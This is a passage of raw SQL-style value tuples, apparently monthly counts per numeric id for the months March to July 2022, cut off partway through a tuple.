(3710,2,'202203',22),(3774,2,'202203',22),(4373,2,'202203',22),(4428,2,'202203',22),(4440,2,'202203',22),(4448,2,'202203',22),(1584,2,'202203',23),(1592,2,'202203',23),(1720,2,'202203',23),(1724,2,'202203',23),(2956,2,'202203',23),(3285,2,'202203',23),(3749,2,'202203',23),(485,2,'202203',24),(1728,2,'202203',24),(2558,2,'202203',24),(3038,2,'202203',24),(3124,2,'202203',24),(3777,2,'202203',24),(4329,2,'202203',24),(4377,2,'202203',24),(4432,2,'202203',24),(472,2,'202203',25),(486,2,'202203',25),(1778,2,'202203',25),(2150,2,'202203',25),(2775,2,'202203',25),(2911,2,'202203',25),(3023,2,'202203',25),(4238,2,'202203',25),(4338,2,'202203',25),(4454,2,'202203',25),(470,2,'202203',26),(474,2,'202203',26),(487,2,'202203',26),(1732,2,'202203',26),(3041,2,'202203',26),(3724,2,'202203',26),(3771,2,'202203',26),(4420,2,'202203',26),(2989,2,'202203',27),(3027,2,'202203',27),(3090,2,'202203',27),(3313,2,'202203',27),(1604,2,'202203',28),(2751,2,'202203',28),(3006,2,'202203',28),(3063,2,'202203',28),(3282,2,'202203',28),(3479,2,'202203',28),(4391,2,'202203',28),(4404,2,'202203',28),(4551,2,'202203',28),(477,2,'202203',29),(3752,2,'202203',29),(2704,2,'202203',30),(3072,2,'202203',30),(3746,2,'202203',30),(4412,2,'202203',30),(4416,2,'202203',30),(4517,2,'202203',30),(4542,2,'202203',30),(570,2,'202203',31),(2148,2,'202203',31),(3004,2,'202203',31),(3104,2,'202203',31),(4326,2,'202203',31),(468,2,'202203',32),(1610,2,'202203',32),(2297,2,'202203',32),(2609,2,'202203',32),(3045,2,'202203',32),(3316,2,'202203',32),(3742,2,'202203',32),(4341,2,'202203',32),(4444,2,'202203',32),(471,2,'202203',33),(2801,2,'202203',34),(3251,2,'202203',34),(4514,2,'202203',34),(4335,2,'202203',35),(4400,2,'202203',36),(108,2,'202203',37),(335,2,'202203',37),(473,2,'202203',37),(84,2,'202203',38),(3764,2,'202203',38),(2159,2,'202203',39),(2813,2,'202203',39),(3117,2,'202203',39),(2457,2,'202203',41),(3060,2,'202203',41),(1614,2,'202203',42),(2769,2,'202203',43),(3127,2,'202203',43),(4529,2,'202203',43),(469,2,'202203',44),(1596,2,'202203',44),(2503,2,'202203',44),(4566,2,'202203',44),(1612,2,'202203',45),(4520,2,'202203',45),(2809,2,'202203',48),(3781,2,'202203',49),(4524,2,'202203',49),(87,2,'202203',53),(91,2,'202203',59),(1582,2,'202203',60),(76,2,'202203',61),(3069,2,'202203',61),(1588,2,'202203',62),(1606,2,'202203',62),(1608,2,'202203',68),(4457,2,'202203',70),(89,2,'202203',71),(1598,2,'202203',75),(2309,2,'202203',75),(1594,2,'202203',89),(4582,2,'202203',89),(68,2,'202203',92),(1544,2,'202203',96),(1602,2,'202203',101),(3030,2,'202203',112),(72,2,'202203',127),(1600,2,'202203',127),(1586,2,'202203',179),(2904,2,'202203',182),(80,2,'202203',208),(9,2,'202203',2675),(110,2,'202204',2),(106,2,'202204',4),(4648,2,'202204',9),(4645,2,'202204',10),(2293,2,'202204',12),(4651,2,'202204',13),(3247,2,'202204',15),(3269,2,'202204',15),(3727,2,'202204',15),(4363,2,'202204',15),(1705,2,'202204',16),(1732,2,'202204',16),(1776,2,'202204',16),(3229,2,'202204',16),(4654,2,'202204',16),(4657,2,'202204',16),(4660,2,'202204',16),(1730,2,'202204',17),(1734,2,'202204',17),(1747,2,'202204',17),(1780,2,'202204',17),(2248,2,'202204',17),(3249,2,'202204',17),(3257,2,'202204',17),(3263,2,'202204',17),(3265,2,'202204',17),(3280,2,'202204',17),(1699,2,'202204',18),(1739,2,'202204',18),(1751,2,'202204',18),(2063,2,'202204',18),(2252,2,'202204',18),(3096,2,'202204',18),(3259,2,'202204',18),(4357,2,'202204',18),(4377,2,'202204',18),(4663,2,'202204',18),(1743,2,'202204',19),(2152,2,'202204',19),(2156,2,'202204',19),(2991,2,'202204',19),(3092,2,'202204',19),(3109,2,'202204',19),(3240,2,'202204',19),(3271,2,'202204',19),(3273,2,'202204',19),(3541,2,'202204',19),(3749,2,'202204',19),(4612,2,'202204',19),(1703,2,'202204',20),(1713,2,'202204',20),(1715,2,'202204',20),(1720,2,'202204',20),(1726,2,'202204',20),(1737,2,'202204',20),(1749,2,'202204',20),(1772,2,'202204',20),(2161,2,'202204',20),(2178,2,'202204',20),(2748,2,'202204',20),(2965,2,'202204',20),(3034,2,'202204',20),(3245,2,'202204',20),(3275,2,'202204',20),(3486,2,'202204',20),(3735,2,'202204',20),(4368,2,'202204',20),(484,2,'202204',21),(1782,2,'202204',21),(3023,2,'202204',21),(3243,2,'202204',21),(3261,2,'202204',21),(3267,2,'202204',21),(3287,2,'202204',21),(3738,2,'202204',21),(4329,2,'202204',21),(4608,2,'202204',21),(102,2,'202204',22),(1695,2,'202204',22),(1709,2,'202204',22),(1718,2,'202204',22),(1768,2,'202204',22),(2658,2,'202204',22),(3079,2,'202204',22),(3721,2,'202204',22),(3724,2,'202204',22),(4332,2,'202204',22),(4373,2,'202204',22),(4382,2,'202204',22),(476,2,'202204',23),(1745,2,'202204',23),(2148,2,'202204',23),(2801,2,'202204',23),(2993,2,'202204',23),(3087,2,'202204',23),(3251,2,'202204',23),(3253,2,'202204',23),(3307,2,'202204',23),(3534,2,'202204',23),(4238,2,'202204',23),(4428,2,'202204',23),(4444,2,'202204',23),(478,2,'202204',24),(485,2,'202204',24),(2751,2,'202204',24),(3102,2,'202204',24),(3124,2,'202204',24),(3297,2,'202204',24),(3714,2,'202204',24),(3731,2,'202204',24),(3777,2,'202204',24),(4301,2,'202204',24),(4387,2,'202204',24),(1697,2,'202204',25),(1770,2,'202204',25),(2150,2,'202204',25),(2165,2,'202204',25),(2956,2,'202204',25),(2989,2,'202204',25),(3097,2,'202204',25),(3226,2,'202204',25),(3278,2,'202204',25),(3282,2,'202204',25),(3285,2,'202204',25),(3316,2,'202204',25),(3531,2,'202204',25),(3771,2,'202204',25),(4424,2,'202204',25),(4436,2,'202204',25),(4546,2,'202204',25),(481,2,'202204',26),(483,2,'202204',26),(1590,2,'202204',26),(1724,2,'202204',26),(2911,2,'202204',26),(2964,2,'202204',26),(3006,2,'202204',26),(3066,2,'202204',26),(3083,2,'202204',26),(3107,2,'202204',26),(3774,2,'202204',26),(4341,2,'202204',26),(488,2,'202204',27),(1711,2,'202204',27),(3072,2,'202204',27),(3498,2,'202204',27),(3710,2,'202204',27),(4326,2,'202204',27),(4338,2,'202204',27),(4556,2,'202204',27),(477,2,'202204',28),(1778,2,'202204',28),(2154,2,'202204',28),(2297,2,'202204',28),(2558,2,'202204',28),(3038,2,'202204',28),(3041,2,'202204',28),(3045,2,'202204',28),(3489,2,'202204',28),(4335,2,'202204',28),(4396,2,'202204',28),(4408,2,'202204',28),(4514,2,'202204',28),(471,2,'202204',29),(1701,2,'202204',29),(1707,2,'202204',29),(1774,2,'202204',29),(2704,2,'202204',29),(3027,2,'202204',29),(3090,2,'202204',29),(3742,2,'202204',29),(4275,2,'202204',29),(4323,2,'202204',29),(4391,2,'202204',29),(4432,2,'202204',29),(480,2,'202204',30),(486,2,'202204',30),(1766,2,'202204',30),(2296,2,'202204',30),(2617,2,'202204',30),(3117,2,'202204',30),(3290,2,'202204',30),(3430,2,'202204',30),(3438,2,'202204',30),(4404,2,'202204',30),(4454,2,'202204',30),(467,2,'202204',31),(2775,2,'202204',31),(2804,2,'202204',31),(2813,2,'202204',31),(4420,2,'202204',31),(4440,2,'202204',31),(472,2,'202204',32),(3005,2,'202204',33),(3063,2,'202204',33),(474,2,'202204',34),(479,2,'202204',34),(1722,2,'202204',34),(2809,2,'202204',34),(3313,2,'202204',34),(1610,2,'202204',35),(1741,2,'202204',35),(4448,2,'202204',35),(1584,2,'202204',36),(2457,2,'202204',36),(3482,2,'202204',36),(4517,2,'202204',36),(4591,2,'202204',36),(4412,2,'202204',37),(4542,2,'202204',37),(473,2,'202204',38),(482,2,'202204',38),(1614,2,'202204',38),(2159,2,'202204',38),(3104,2,'202204',38),(1592,2,'202204',39),(4416,2,'202204',39),(468,2,'202204',40),(1604,2,'202204',40),(3479,2,'202204',40),(570,2,'202204',41),(4551,2,'202204',41),(4587,2,'202204',42),(3060,2,'202204',43),(74,2,'202204',44),(487,2,'202204',44),(3069,2,'202204',44),(3746,2,'202204',45),(84,2,'202204',46),(335,2,'202204',46),(470,2,'202204',47),(3004,2,'202204',48),(3127,2,'202204',48),(1728,2,'202204',49),(2609,2,'202204',49),(4400,2,'202204',49),(4566,2,'202204',49),(3752,2,'202204',50),(4529,2,'202204',50),(108,2,'202204',51),(469,2,'202204',51),(2769,2,'202204',51),(2503,2,'202204',52),(1612,2,'202204',54),(4524,2,'202204',54),(3764,2,'202204',55),(1596,2,'202204',58),(1608,2,'202204',58),(2309,2,'202204',63),(1582,2,'202204',65),(1598,2,'202204',65),(1606,2,'202204',65),(87,2,'202204',68),(4520,2,'202204',68),(3781,2,'202204',69),(76,2,'202204',79),(1588,2,'202204',80),(4457,2,'202204',80),(1594,2,'202204',81),(4582,2,'202204',81),(1544,2,'202204',84),(3030,2,'202204',86),(89,2,'202204',93),(72,2,'202204',100),(68,2,'202204',102),(91,2,'202204',107),(1600,2,'202204',111),(2904,2,'202204',122),(1602,2,'202204',141),(1586,2,'202204',153),(80,2,'202204',266),(9,2,'202204',2539),(3247,2,'202205',7),(106,2,'202205',8),(1739,2,'202205',8),(3278,2,'202205',8),(1780,2,'202205',9),(3096,2,'202205',9),(3097,2,'202205',9),(3273,2,'202205',9),(3287,2,'202205',9),(4357,2,'202205',9),(479,2,'202205',10),(1699,2,'202205',10),(1709,2,'202205',10),(1732,2,'202205',10),(1745,2,'202205',10),(2252,2,'202205',10),(3245,2,'202205',10),(1720,2,'202205',11),(1743,2,'202205',11),(1751,2,'202205',11),(1776,2,'202205',11),(2150,2,'202205',11),(2156,2,'202205',11),(2293,2,'202205',11),(2991,2,'202205',11),(3229,2,'202205',11),(3249,2,'202205',11),(3257,2,'202205',11),(3263,2,'202205',11),(3265,2,'202205',11),(3269,2,'202205',11),(3275,2,'202205',11),(4382,2,'202205',11),(480,2,'202205',12),(1747,2,'202205',12),(1778,2,'202205',12),(2161,2,'202205',12),(2748,2,'202205',12),(2965,2,'202205',12),(2989,2,'202205',12),(3005,2,'202205',12),(3092,2,'202205',12),(3280,2,'202205',12),(4368,2,'202205',12),(4377,2,'202205',12),(4387,2,'202205',12),(473,2,'202205',13),(474,2,'202205',13),(478,2,'202205',13),(486,2,'202205',13),(1695,2,'202205',13),(1701,2,'202205',13),(1705,2,'202205',13),(1713,2,'202205',13),(1715,2,'202205',13),(1724,2,'202205',13),(1737,2,'202205',13),(1749,2,'202205',13),(2063,2,'202205',13),(2152,2,'202205',13),(2248,2,'202205',13),(2658,2,'202205',13),(3079,2,'202205',13),(3109,2,'202205',13),(3243,2,'202205',13),(3259,2,'202205',13),(3261,2,'202205',13),(3297,2,'202205',13),(3714,2,'202205',13),(4275,2,'202205',13),(4338,2,'202205',13),(4556,2,'202205',13),(4591,2,'202205',13),(483,2,'202205',14),(1718,2,'202205',14),(1774,2,'202205',14),(1782,2,'202205',14),(2148,2,'202205',14),(2178,2,'202205',14),(2558,2,'202205',14),(2993,2,'202205',14),(3006,2,'202205',14),(3738,2,'202205',14),(4373,2,'202205',14),(4391,2,'202205',14),(4440,2,'202205',14),(4546,2,'202205',14),(476,2,'202205',15),(481,2,'202205',15),(488,2,'202205',15),(1734,2,'202205',15),(2775,2,'202205',15),(2964,2,'202205',15),(3087,2,'202205',15),(3240,2,'202205',15),(3267,2,'202205',15),(3271,2,'202205',15),(3285,2,'202205',15),(4514,2,'202205',15),(4608,2,'202205',15),(110,2,'202205',16),(485,2,'202205',16),(1703,2,'202205',16),(1726,2,'202205',16),(1730,2,'202205',16),(2617,2,'202205',16),(3041,2,'202205',16),(3102,2,'202205',16),(3253,2,'202205',16),(3282,2,'202205',16),(3541,2,'202205',16),(4363,2,'202205',16),(4396,2,'202205',16),(4542,2,'202205',16),(1590,2,'202205',17),(1722,2,'202205',17),(1768,2,'202205',17),(3107,2,'202205',17),(3482,2,'202205',17),(3531,2,'202205',17),(3721,2,'202205',17),(3731,2,'202205',17),(3777,2,'202205',17),(4428,2,'202205',17),(4432,2,'202205',17),(4517,2,'202205',17),(4587,2,'202205',17),(472,2,'202205',18),(1697,2,'202205',18),(1770,2,'202205',18),(1772,2,'202205',18),(2296,2,'202205',18),(3104,2,'202205',18),(3251,2,'202205',18),(4332,2,'202205',18),(4424,2,'202205',18),(102,2,'202205',19),(484,2,'202205',19),(487,2,'202205',19),(2165,2,'202205',19),(2751,2,'202205',19),(3226,2,'202205',19),(3316,2,'202205',19),(3727,2,'202205',19),(3735,2,'202205',19),(3771,2,'202205',19),(3774,2,'202205',19),(4301,2,'202205',19),(4329,2,'202205',19),(4436,2,'202205',19),(4444,2,'202205',19),(4612,2,'202205',19),(467,2,'202205',20),(1584,2,'202205',20),(1741,2,'202205',20),(2154,2,'202205',20),(3066,2,'202205',20),(3083,2,'202205',20),(3090,2,'202205',20),(3290,2,'202205',20),(3430,2,'202205',20),(4341,2,'202205',20),(1707,2,'202205',21),(2704,2,'202205',21),(3034,2,'202205',21),(3486,2,'202205',21),(470,2,'202205',22),(477,2,'202205',22),(482,2,'202205',22),(1728,2,'202205',22),(2956,2,'202205',22),(3023,2,'202205',22),(3124,2,'202205',22),(3724,2,'202205',22),(3746,2,'202205',22),(3749,2,'202205',22),(4404,2,'202205',22),(4408,2,'202205',22),(3498,2,'202205',23),(3534,2,'202205',23),(3710,2,'202205',23),(4454,2,'202205',23),(468,2,'202205',24),(2609,2,'202205',24),(3307,2,'202205',24),(3438,2,'202205',24),(4323,2,'202205',24),(4551,2,'202205',24),(570,2,'202205',26),(2769,2,'202205',26),(3038,2,'202205',26),(3479,2,'202205',26),(4420,2,'202205',26),(4668,2,'202205',26),(4674,2,'202205',26),(2159,2,'202205',27),(1604,2,'202205',28),(4238,2,'202205',28),(4412,2,'202205',28),(4448,2,'202205',28),(1711,2,'202205',29),(2801,2,'202205',29),(2813,2,'202205',29),(3045,2,'202205',29),(4335,2,'202205',29),(4677,2,'202205',29),(4681,2,'202205',29),(4688,2,'202205',29),(1592,2,'202205',30),(1766,2,'202205',30),(4691,2,'202205',30),(74,2,'202205',31),(3489,2,'202205',31),(4648,2,'202205',31),(4685,2,'202205',31),(4700,2,'202205',31),(2911,2,'202205',32),(4697,2,'202205',32),(2297,2,'202205',33),(3072,2,'202205',33),(3752,2,'202205',33),(4326,2,'202205',33),(4694,2,'202205',33),(1614,2,'202205',34),(4524,2,'202205',34),(2804,2,'202205',35),(4703,2,'202205',35),(4712,2,'202205',35),(4529,2,'202205',36),(471,2,'202205',37),(3313,2,'202205',37),(4566,2,'202205',37),(2809,2,'202205',40),(4709,2,'202205',40),(4722,2,'202205',40),(3027,2,'202205',41),(108,2,'202205',42),(1612,2,'202205',42),(3060,2,'202205',42),(4651,2,'202205',42),(4706,2,'202205',42),(1588,2,'202205',43),(1610,2,'202205',43),(4400,2,'202205',43),(3004,2,'202205',44),(4645,2,'202205',44),(1606,2,'202205',47),(3742,2,'202205',47),(4416,2,'202205',47),(2309,2,'202205',49),(3117,2,'202205',49),(4663,2,'202205',49),(1608,2,'202205',50),(2457,2,'202205',50),(3063,2,'202205',50),(335,2,'202205',51),(3127,2,'202205',51),(4657,2,'202205',51),(87,2,'202205',52),(2503,2,'202205',53),(4660,2,'202205',53),(3069,2,'202205',54),(4654,2,'202205',55),(3764,2,'202205',58),(4582,2,'202205',58),(84,2,'202205',59),(3030,2,'202205',59),(4520,2,'202205',59),(1544,2,'202205',60),(4457,2,'202205',61),(1596,2,'202205',66),(1598,2,'202205',67),(1594,2,'202205',69),(76,2,'202205',70),(469,2,'202205',73),(89,2,'202205',74),(3781,2,'202205',75),(1600,2,'202205',77),(91,2,'202205',86),(1602,2,'202205',94),(1582,2,'202205',96),(72,2,'202205',104),(68,2,'202205',107),(1586,2,'202205',127),(2904,2,'202205',146),(80,2,'202205',309),(9,2,'202205',3735),(110,2,'202206',6),(3269,2,'202206',7),(106,2,'202206',8),(2252,2,'202206',8),(3259,2,'202206',8),(4363,2,'202206',8),(4368,2,'202206',8),(1705,2,'202206',9),(1751,2,'202206',9),(2293,2,'202206',9),(2993,2,'202206',9),(3249,2,'202206',9),(3273,2,'202206',9),(4357,2,'202206',9),(4741,2,'202206',9),(1782,2,'202206',10),(2156,2,'202206',10),(2658,2,'202206',10),(3240,2,'202206',10),(3243,2,'202206',10),(3257,2,'202206',10),(482,2,'202206',11),(1699,2,'202206',11),(1720,2,'202206',11),(1726,2,'202206',11),(2063,2,'202206',11),(3104,2,'202206',11),(3107,2,'202206',11),(3247,2,'202206',11),(3271,2,'202206',11),(3735,2,'202206',11),(3746,2,'202206',11),(4373,2,'202206',11),(4377,2,'202206',11),(4382,2,'202206',11),(4756,2,'202206',11),(4759,2,'202206',11),(1711,2,'202206',12),(1713,2,'202206',12),(1715,2,'202206',12),(1732,2,'202206',12),(1749,2,'202206',12),(2161,2,'202206',12),(2956,2,'202206',12),(2965,2,'202206',12),(3265,2,'202206',12),(4387,2,'202206',12),(4440,2,'202206',12),(4556,2,'202206',12),(1734,2,'202206',13),(1737,2,'202206',13),(1739,2,'202206',13),(1741,2,'202206',13),(1747,2,'202206',13),(1768,2,'202206',13),(1776,2,'202206',13),(1778,2,'202206',13),(1780,2,'202206',13),(2558,2,'202206',13),(2989,2,'202206',13),(3092,2,'202206',13),(3229,2,'202206',13),(3253,2,'202206',13),(3263,2,'202206',13),(3287,2,'202206',13),(3738,2,'202206',13),(4301,2,'202206',13),(4408,2,'202206',13),(4514,2,'202206',13),(4648,2,'202206',13),(4753,2,'202206',13),(481,2,'202206',14),(1743,2,'202206',14),(1745,2,'202206',14),(1772,2,'202206',14),(3079,2,'202206',14),(3096,2,'202206',14),(3097,2,'202206',14),(3109,2,'202206',14),(3245,2,'202206',14),(3261,2,'202206',14),(3275,2,'202206',14),(3498,2,'202206',14),(3727,2,'202206',14),(3752,2,'202206',14),(4275,2,'202206',14),(4341,2,'202206',14),(4391,2,'202206',14),(4396,2,'202206',14),(4566,2,'202206',14),(4668,2,'202206',14),(4747,2,'202206',14),(479,2,'202206',15),(485,2,'202206',15),(1590,2,'202206',15),(1697,2,'202206',15),(1709,2,'202206',15),(1774,2,'202206',15),(2751,2,'202206',15),(3226,2,'202206',15),(3278,2,'202206',15),(3290,2,'202206',15),(3430,2,'202206',15),(3482,2,'202206',15),(3486,2,'202206',15),(3531,2,'202206',15),(3541,2,'202206',15),(3777,2,'202206',15),(4329,2,'202206',15),(4428,2,'202206',15),(4444,2,'202206',15),(4454,2,'202206',15),(4681,2,'202206',15),(4744,2,'202206',15),(4750,2,'202206',15),(480,2,'202206',16),(1701,2,'202206',16),(2248,2,'202206',16),(3034,2,'202206',16),(3041,2,'202206',16),(3087,2,'202206',16),(3124,2,'202206',16),(3282,2,'202206',16),(3534,2,'202206',16),(3714,2,'202206',16),(3749,2,'202206',16),(4238,2,'202206',16),(4424,2,'202206',16),(4517,2,'202206',16),(4546,2,'202206',16),(4591,2,'202206',16),(483,2,'202206',17),(484,2,'202206',17),(1695,2,'202206',17),(1730,2,'202206',17),(1770,2,'202206',17),(2148,2,'202206',17),(2150,2,'202206',17),(2154,2,'202206',17),(2748,2,'202206',17),(3006,2,'202206',17),(3267,2,'202206',17),(3297,2,'202206',17),(3721,2,'202206',17),(3724,2,'202206',17),(4335,2,'202206',17),(4551,2,'202206',17),(2178,2,'202206',18),(3438,2,'202206',18),(3489,2,'202206',18),(3771,2,'202206',18),(3774,2,'202206',18),(4404,2,'202206',18),(4448,2,'202206',18),(4608,2,'202206',18),(478,2,'202206',19),(488,2,'202206',19),(3023,2,'202206',19),(3045,2,'202206',19),(3285,2,'202206',19),(4323,2,'202206',19),(4432,2,'202206',19),(470,2,'202206',20),(1592,2,'202206',20),(2152,2,'202206',20),(2165,2,'202206',20),(2964,2,'202206',20),(3038,2,'202206',20),(3251,2,'202206',20),(3307,2,'202206',20),(4416,2,'202206',20),(4542,2,'202206',20),(4587,2,'202206',20),(4688,2,'202206',20),(473,2,'202206',21),(476,2,'202206',21),(570,2,'202206',21),(1703,2,'202206',21),(3280,2,'202206',21),(4332,2,'202206',21),(4762,2,'202206',21),(4768,2,'202206',21),(474,2,'202206',22),(1718,2,'202206',22),(1724,2,'202206',22),(2296,2,'202206',22),(2775,2,'202206',22),(2991,2,'202206',22),(3005,2,'202206',22),(3731,2,'202206',22),(4685,2,'202206',22),(102,2,'202206',23),(468,2,'202206',23),(486,2,'202206',23),(487,2,'202206',23),(1766,2,'202206',23),(2617,2,'202206',23),(2704,2,'202206',23),(3004,2,'202206',23),(471,2,'202206',24),(1584,2,'202206',24),(2813,2,'202206',24),(2911,2,'202206',24),(3710,2,'202206',24),(4524,2,'202206',24),(4612,2,'202206',24),(467,2,'202206',25),(1722,2,'202206',25),(4436,2,'202206',25),(4712,2,'202206',25),(4771,2,'202206',25),(1604,2,'202206',26),(1728,2,'202206',26),(2159,2,'202206',26),(3072,2,'202206',26),(4338,2,'202206',26),(4420,2,'202206',26),(4677,2,'202206',26),(3060,2,'202206',27),(4697,2,'202206',27),(4765,2,'202206',27),(2609,2,'202206',28),(3316,2,'202206',28),(2801,2,'202206',29),(3083,2,'202206',29),(74,2,'202206',30),(2769,2,'202206',30),(3066,2,'202206',30),(3479,2,'202206',30),(4645,2,'202206',30),(2457,2,'202206',31),(4722,2,'202206',31),(1707,2,'202206',32),(2297,2,'202206',32),(3090,2,'202206',33),(472,2,'202206',34),(469,2,'202206',35),(3102,2,'202206',35),(477,2,'202206',36),(1614,2,'202206',36),(1596,2,'202206',37),(4326,2,'202206',38),(4412,2,'202206',38),(1612,2,'202206',39),(2309,2,'202206',39),(4700,2,'202206',39),(1608,2,'202206',40),(4529,2,'202206',40),(4663,2,'202206',40),(4674,2,'202206',40),(3742,2,'202206',41),(4691,2,'202206',42),(3313,2,'202206',43),(4582,2,'202206',43),(4651,2,'202206',43),(4400,2,'202206',44),(84,2,'202206',45),(3027,2,'202206',45),(3127,2,'202206',45),(4654,2,'202206',45),(4660,2,'202206',45),(4703,2,'202206',45),(1588,2,'202206',47),(1606,2,'202206',47),(3069,2,'202206',47),(3117,2,'202206',47),(4657,2,'202206',47),(4694,2,'202206',47),(2503,2,'202206',48),(87,2,'202206',49),(335,2,'202206',49),(2809,2,'202206',49),(2804,2,'202206',50),(4706,2,'202206',50),(3063,2,'202206',52),(4520,2,'202206',52),(108,2,'202206',53),(1598,2,'202206',53),(4709,2,'202206',53),(1600,2,'202206',54),(1544,2,'202206',58),(1602,2,'202206',59),(3030,2,'202206',61),(3764,2,'202206',61),(76,2,'202206',62),(1610,2,'202206',62),(91,2,'202206',64),(3781,2,'202206',64),(89,2,'202206',65),(4457,2,'202206',75),(1594,2,'202206',83),(68,2,'202206',117),(1586,2,'202206',155),(1582,2,'202206',158),(72,2,'202206',182),(2904,2,'202206',213),(80,2,'202206',268),(9,2,'202206',2846),(4792,2,'202207',2),(4802,2,'202207',2),(4797,2,'202207',3),(110,2,'202207',5),(106,2,'202207',6),(2965,2,'202207',7),(1711,2,'202207',8),(2293,2,'202207',8),(4377,2,'202207',8),(1697,2,'202207',9),(2161,2,'202207',9),(4357,2,'202207',9),(4363,2,'202207',9),(1699,2,'202207',10),(1713,2,'202207',10),(1726,2,'202207',10),(4744,2,'202207',10),(1734,2,'202207',11),(1749,2,'202207',11),(1782,2,'202207',11),(2156,2,'202207',11),(2296,2,'202207',11),(2993,2,'202207',11),(3240,2,'202207',11),(4373,2,'202207',11),(4591,2,'202207',11),(1715,2,'202207',12),(1720,2,'202207',12),(1730,2,'202207',12),(1732,2,'202207',12),(1745,2,'202207',12),(2063,2,'202207',12),(2748,2,'202207',12),(2989,2,'202207',12),(3079,2,'202207',12),(3104,2,'202207',12),(3226,2,'202207',12),(3263,2,'202207',12),(3265,2,'202207',12),(3738,2,'202207',12),(4329,2,'202207',12),(4341,2,'202207',12),(4396,2,'202207',12),(4444,2,'202207',12),(1604,2,'202207',13),(1695,2,'202207',13),(1724,2,'202207',13),(1737,2,'202207',13),(1747,2,'202207',13),(2150,2,'202207',13),(2154,2,'202207',13),(2248,2,'202207',13),(2704,2,'202207',13),(3006,2,'202207',13),(3097,2,'202207',13),(3109,2,'202207',13),(3229,2,'202207',13),(3249,2,'202207',13),(3257,2,'202207',13),(3269,2,'202207',13),(4275,2,'202207',13),(4387,2,'202207',13),(4440,2,'202207',13),(4668,2,'202207',13),(102,2,'202207',14),(473,2,'202207',14),(484,2,'202207',14),(1705,2,'202207',14),(1739,2,'202207',14),(1743,2,'202207',14),(1776,2,'202207',14),(1778,2,'202207',14),(2956,2,'202207',14),(3034,2,'202207',14),(3041,2,'202207',14),(3245,2,'202207',14),(3271,2,'202207',14),(3273,2,'202207',14),(3278,2,'202207',14),(3287,2,'202207',14),(3486,2,'202207',14),(3777,2,'202207',14),(4382,2,'202207',14),(4556,2,'202207',14),(4648,2,'202207',14),(481,2,'202207',15),(482,2,'202207',15),(488,2,'202207',15),(1592,2,'202207',15),(1707,2,'202207',15),(1709,2,'202207',15),(1718,2,'202207',15),(1751,2,'202207',15),(1772,2,'202207',15),(1774,2,'202207',15),(2148,2,'202207',15),(2165,2,'202207',15),(2178,2,'202207',15),(2658,2,'202207',15),(3247,2,'202207',15),(3259,2,'202207',15),(3261,2,'202207',15),(3280,2,'202207',15),(3282,2,'202207',15),(3430,2,'202207',15),(3531,2,'202207',15),(4238,2,'202207',15),(4301,2,'202207',15),(4404,2,'202207',15),(4408,2,'202207',15),(4432,2,'202207',15),(4587,2,'202207',15),(4681,2,'202207',15),(4688,2,'202207',15),(4741,2,'202207',15),(476,2,'202207',16),(1703,2,'202207',16),(2252,2,'202207',16),(2558,2,'202207',16),(2775,2,'202207',16),(3005,2,'202207',16),(3087,2,'202207',16),(3096,2,'202207',16),(3243,2,'202207',16),(3275,2,'202207',16),(4332,2,'202207',16),(4428,2,'202207',16),(4448,2,'202207',16),(479,2,'202207',17),(485,2,'202207',17),(1590,2,'202207',17),(1741,2,'202207',17),(2769,2,'202207',17),(2991,2,'202207',17),(3023,2,'202207',17),(3038,2,'202207',17),(3107,2,'202207',17),(3316,2,'202207',17),(3541,2,'202207',17),(3749,2,'202207',17),(3752,2,'202207',17),(3774,2,'202207',17),(4335,2,'202207',17),(4368,2,'202207',17),(4391,2,'202207',17),(4424,2,'202207',17),(4454,2,'202207',17),(4514,2,'202207',17),(4546,2,'202207',17),(4566,2,'202207',17),(483,2,'202207',18),(1768,2,'202207',18),(3083,2,'202207',18),(3251,2,'202207',18),(3253,2,'202207',18),(3267,2,'202207',18),(3297,2,'202207',18),(4436,2,'202207',18),(4517,2,'202207',18),(4542,2,'202207',18),(4551,2,'202207',18),(471,2,'202207',19),(477,2,'202207',19),(480,2,'202207',19),(1701,2,'202207',19),(1770,2,'202207',19),(3004,2,'202207',19),(3290,2,'202207',19),(3307,2,'202207',19),(3482,2,'202207',19),(3534,2,'202207',19),(3714,2,'202207',19),(3746,2,'202207',19),(3771,2,'202207',19),(4524,2,'202207',19),(4608,2,'202207',19),(470,2,'202207',20),(472,2,'202207',20),(478,2,'202207',20),(486,2,'202207',20),(3092,2,'202207',20),(3438,2,'202207',20),(3727,2,'202207',20),(4612,2,'202207',20),(487,2,'202207',21),(3102,2,'202207',21),(3724,2,'202207',21),(3735,2,'202207',21),(4712,2,'202207',21),(570,2,'202207',22),(2159,2,'202207',22),(2617,2,'202207',22),(2813,2,'202207',22),(2911,2,'202207',22),(3124,2,'202207',22),(3710,2,'202207',22),(3721,2,'202207',22),(3731,2,'202207',22),(467,2,'202207',23),(2609,2,'202207',23),(3045,2,'202207',23),(1584,2,'202207',24),(2751,2,'202207',24),(2801,2,'202207',24),(2964,2,'202207',24),(474,2,'202207',25),(1766,2,'202207',25),(3285,2,'202207',25),(4756,2,'202207',25),(468,2,'202207',26),(3090,2,'202207',26),(3498,2,'202207',26),(4747,2,'202207',26),(4753,2,'202207',26),(2457,2,'202207',27),(4697,2,'202207',27),(4750,2,'202207',27),(1780,2,'202207',29),(3489,2,'202207',29),(4759,2,'202207',29),(4762,2,'202207',29),(4416,2,'202207',30),(1728,2,'202207',31),(2297,2,'202207',31),(1614,2,'202207',32),(3479,2,'202207',32),(4709,2,'202207',32),(469,2,'202207',33),(1598,2,'202207',33),(2152,2,'202207',33),(335,2,'202207',34),(1606,2,'202207',34),(1608,2,'202207',34),(4706,2,'202207',34),(74,2,'202207',35),(1588,2,'202207',36),(4323,2,'202207',37),(4412,2,'202207',37),(4700,2,'202207',37),(4765,2,'202207',37),(1722,2,'202207',38),(4338,2,'202207',38),(4651,2,'202207',38),(4768,2,'202207',38),(4660,2,'202207',39),(4691,2,'202207',39),(4703,2,'202207',39),(3072,2,'202207',40),(4685,2,'202207',40),(108,2,'202207',41),(3060,2,'202207',42),(4645,2,'202207',42),(4771,2,'202207',42),(1544,2,'202207',43),(2503,2,'202207',43),(4420,2,'202207',43),(4582,2,'202207',43),(4654,2,'202207',43),(4657,2,'202207',43),(4663,2,'202207',43),(2804,2,'202207',44),(3313,2,'202207',45),(3742,2,'202207',45),(4326,2,'202207',45),(1610,2,'202207',46),(4722,2,'202207',46),(3069,2,'202207',47),(4776,2,'202207',47),(87,2,'202207',48),(4400,2,'202207',48),(91,2,'202207',49),(1600,2,'202207',49),(3127,2,'202207',49),(4457,2,'202207',49),(4694,2,'202207',49),(3027,2,'202207',50),(3063,2,'202207',50),(4674,